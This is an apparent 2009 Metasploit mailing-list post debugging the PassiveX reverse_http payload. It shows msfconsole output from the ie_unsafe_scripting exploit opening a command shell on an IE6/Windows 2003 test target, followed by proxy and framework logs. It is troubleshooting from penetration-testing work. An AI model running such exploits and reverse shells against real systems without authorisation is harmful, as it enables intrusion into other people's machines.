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PassiveX payloads

From: bogdan at (Bogdan)
Date: Thu, 16 Apr 2009 12:27:12 +0300

I have tried debugging the PassiveX payload. Here are the details:
metasploit from svn rev 6488 (updated Apr 16 2009).
I used the ie_unsafe_scripting exploit for testing.
Loglevel was set to 3.
The target was Internet Explorer 6 running on Windows 2003 SP2.

The payload was windows/shell/reverse_http

msf exploit(ie_unsafe_scripting) > exploit
[*] Exploit running as background job.
msf exploit(ie_unsafe_scripting) >
[*] PassiveX listener started.
[*] Using URL:
[*] Server started.
[*] Request received from
[*] Encoding payload into vbs/javascript/html...
[*] Sending exploit html/javascript to
[*] Exe will be uVKua.exe and must be manually removed from the %TEMP% 
directory on the target.
[*] Sending PassiveX main page to client
[*] Command shell session 1 opened (Local Pipe -> Remote Pipe)
[*] Sending stage to sid 1 (474 bytes)

msf exploit(ie_unsafe_scripting) > sessions -l

Active sessions

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  Local Pipe -> Remote Pipe

msf exploit(ie_unsafe_scripting) > sessions -i 1
[*] Starting interaction with 1...

Background session 1? [y/N]  y

The exploit succedes and it creates a session, but when interracting 
with it, there is no output to the commands.

Here are the lines from squid proxy logs:
1239876195.772   4561 TCP_MISS/200 1092068 GET - DIRECT/ text/html
1239876197.247    224 TCP_MISS/200 2693 GET - DIRECT/ text/html
1239876197.753    206 TCP_MISS/200 699 GET - DIRECT/ -
1239876201.913   4151 TCP_MISS/000 0 GET - DIRECT/ -

As you can see the request for tunnel_out returns 0 bytes.

Here are the lines from framewok.log:
[04/16/2009 13:03:00] [d(2)] core: PassiveX listener started on
[04/16/2009 13:03:40] [d(3)] core: 
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Queuing 
1 to remote side
[04/16/2009 13:03:40] [d(3)] core: 
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Flushing 
remote output queue at 1 bytes
[04/16/2009 13:03:40] [d(0)] core: 
Exception during remote queue flush: closed stream
[04/16/2009 13:03:41] [d(3)] core: 
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Flushing 
remote output queue at 1 bytes
[04/16/2009 13:03:41] [d(0)] core: 
Exception during remote queue flush: closed stream
[04/16/2009 13:03:51] [d(3)] core: 
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Queuing 
4 to remote side
[04/16/2009 13:03:51] [d(3)] core: 
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Flushing 
remote output queue at 5 bytes
[04/16/2009 13:03:51] [d(0)] core: 
Exception during remote queue flush: closed stream
[04/16/2009 13:03:53] [d(3)] core: 
PassiveX:#<Msf::Handler::PassiveX::PxSessionChannel:0xf6b027b8> Flushing 
remote output queue at 5 bytes
[04/16/2009 13:03:53] [d(0)] core: 
Exception during remote queue flush: closed stream

I will try examining the source code to find the source of the problem.
Is anyone else using the PassiveX payloads with any success? If so let 
us know.
I think the PassiveX payloads are very important because, as far as I 
know, there are the only way to test a network located behind a proxy 
server from the outside.


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